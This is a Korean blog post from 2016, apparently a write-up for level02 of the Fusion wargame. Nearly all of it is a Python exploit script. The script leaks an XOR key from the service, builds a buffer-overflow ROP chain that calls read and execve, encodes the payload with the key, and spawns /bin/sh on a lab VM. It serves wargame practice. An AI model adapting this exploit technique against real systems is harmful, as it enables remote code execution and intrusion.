BLOG main image
분류 전체보기 (224)
Reversing (13)
Pwnable (4)
Linux Kernel (3)
Crypto (2)
Wargames (68)
Programming (18)
Write Up (32)
Project (22)
Web (2)
My Life (52)
Memo (3)
etc (2)
발표자료 (1)
40,483 Visitors up to today!
Today 0 hit, Yesterday 13 hit
daisy rss
tistory 티스토리 가입하기!
2016.04.20 21:43


중간에 엉뚱한데서 살짝 삽질을 했었다. level03부터 완전 헬이라던데 어떨지 모르겠다.. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from SunKn0wn import *
 
= remote('192.168.179.151'20002)
 
read_plt = 0x08048860
execve_plt = 0x080489b0
bss = 0x0804b420
pppr = 0x80499bd
 
############ get xor key ############
r.recvsend('E')
r.send('\x80\x00\x00\x00')
r.send('\x00' * 0x80)
r.recvuntil('--]\n\x80\x00\x00\x00')
xorkey = r.recv(0x80)
print "[*]Get xor key success!"
 
############ payload ############
payload = 'A' * 0x20010
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)
payload += p32(execve_plt)
payload += 'AAAA'
payload += p32(bss)
payload += p32(0)
payload += p32(0)
realpayload = ''
cnt = 0
for i in payload:
    realpayload += chr(ord(i) ^ ord(xorkey[cnt % 0x80]))
    cnt += 1
 
############ attack ############
r.recvsend('E')
r.send(p32(len(realpayload)))
r.send(realpayload)
sleep(0.2)
r.recvsend('Q')
r.send("/bin/sh\x00")
r.interactive()
cs


'Wargames > fusion' 카테고리의 다른 글

fusion level04  (0) 2016.04.28
fusion level03  (0) 2016.04.25
fusion level02  (0) 2016.04.20
fusion level01  (0) 2016.04.15
fusion level00  (2) 2016.04.15
Name
Password
Homepage
Secret